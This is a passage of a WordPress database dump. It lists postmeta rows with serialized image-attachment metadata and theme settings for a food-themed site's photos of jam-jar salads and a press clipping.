d','4935'),(13246,5134,'_edit_lock','1586772361:1'),(13247,5135,'_wp_attached_file','2020/04/dippyegg-scaled.jpg'),(13248,5135,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1767;s:6:\"height\";i:2560;s:4:\"file\";s:27:\"2020/04/dippyegg-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"dippyegg-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"dippyegg-707x1024.jpg\";s:5:\"width\";i:707;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"dippyegg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"dippyegg-768x1113.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"dippyegg-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"dippyegg-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"dippyegg-1060x1536.jpg\";s:5:\"width\";i:1060;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:22:\"dippyegg-1413x2048.jpg\";s:5:\"width\";i:1413;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"dippyegg-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"dippyegg-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"dippyegg-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"dippyegg-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"dippyegg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"dippyegg-600x869.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:869;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"dippyegg-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"dippyegg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"dippyegg-600x869.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:869;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"dippyegg-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1450767231\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:12:\"dippyegg.jpg\";}'),(13251,5134,'_wp_old_date','2020-04-13'),(13252,5134,'_thumbnail_id','5135'),(13253,5134,'_edit_last','1'),(13256,5134,'qodef_page_content_behind_header_meta','no'),(13257,5134,'qodef_boxed_background_image_attachment_meta','fixed'),(13258,5134,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(13259,5134,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(13260,5134,'qodef_video_type_meta','social_networks'),(13261,5134,'qodef_audio_type_meta','social_networks'),(13262,5134,'qodef_post_skin','qodef-post-light-skin'),(13263,5134,'qodef_disable_vertical_header_background_image_meta','no'),(13264,5134,'qodef_disable_header_widget_logo_area_meta','no'),(13265,5134,'qodef_disable_header_widget_menu_area_meta','no'),(13266,5134,'slide_template','default'),(13267,5134,'rs_page_bg_color','#ffffff'),(13269,5138,'_wp_attached_file','2020/04/Jamjar-for-new-website.jpg'),(13270,5138,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:420;s:6:\"height\";i:630;s:4:\"file\";s:34:\"2020/04/Jamjar-for-new-website.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-420x300.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-420x550.jpg\";s:5:\"width\";i:420;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"Jamjar-for-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"Jamjar-for-new-website-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431505032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13271,5139,'_wp_attached_file','2020/04/Jamjar-pumpkin-and-feta-salad.jpg'),(13272,5139,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1695;s:4:\"file\";s:41:\"2020/04/Jamjar-pumpkin-and-feta-salad.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-300x248.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"Jamjar-pumpkin-and-feta-salad-1024x848.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:848;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-768x636.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:636;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:43:\"Jamjar-pumpkin-and-feta-salad-1536x1271.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:42:\"Jamjar-pumpkin-and-feta-salad-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:42:\"Jamjar-pumpkin-and-feta-salad-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:43:\"Jamjar-pumpkin-and-feta-salad-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-600x497.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:497;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-600x497.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:497;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"Jamjar-pumpkin-and-feta-salad-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431505168\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13273,5140,'_wp_attached_file','2020/04/Jamjar-Salads.jpg'),(13274,5140,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1502;s:6:\"height\";i:2048;s:4:\"file\";s:25:\"2020/04/Jamjar-Salads.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads-751x1024.jpg\";s:5:\"width\";i:751;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads-768x1047.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1047;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"Jamjar-Salads-1127x1536.jpg\";s:5:\"width\";i:1127;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"Jamjar-Salads-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"Jamjar-Salads-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-600x818.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:818;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-600x818.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:818;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"Jamjar-Salads-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431504296\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13275,5141,'_wp_attached_file','2020/04/Jamjar-Salads2.jpg'),(13276,5141,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1466;s:6:\"height\";i:1718;s:4:\"file\";s:26:\"2020/04/Jamjar-Salads2.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-256x300.jpg\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Jamjar-Salads2-874x1024.jpg\";s:5:\"width\";i:874;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-768x900.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"Jamjar-Salads2-1311x1536.jpg\";s:5:\"width\";i:1311;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"Jamjar-Salads2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Jamjar-Salads2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Jamjar-Salads2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Jamjar-Salads2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-600x703.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-600x703.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Jamjar-Salads2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431504296\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13277,5142,'_wp_attached_file','2020/04/Jamjar-smoked-salmon-salad.jpg'),(13278,5142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1467;s:6:\"height\";i:2048;s:4:\"file\";s:38:\"2020/04/Jamjar-smoked-salmon-salad.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-215x300.jpg\";s:5:\"width\";i:215;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:39:\"Jamjar-smoked-salmon-salad-734x1024.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"Jamjar-smoked-salmon-salad-768x1072.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1072;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"Jamjar-smoked-salmon-salad-1100x1536.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:39:\"Jamjar-smoked-salmon-salad-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:39:\"Jamjar-smoked-salmon-salad-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:40:\"Jamjar-smoked-salmon-salad-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-600x838.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-600x838.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:38:\"Jamjar-smoked-salmon-salad-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431505043\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13310,5145,'_edit_lock','1587266403:1'),(13311,5146,'_wp_attached_file','2020/04/press-Northern-life-mag.jpg'),(13312,5146,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:940;s:6:\"height\";i:1215;s:4:\"file\";s:35:\"2020/04/press-Northern-life-mag.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"press-Northern-life-mag-792x1024.jpg\";s:5:\"width\";i:792;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-768x993.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:993;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"press-Northern-life-mag-940x550.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"press-Northern-life-mag-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"press-Northern-life-mag-940x1100.jpg\";s:5:\"width\";i:940;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jp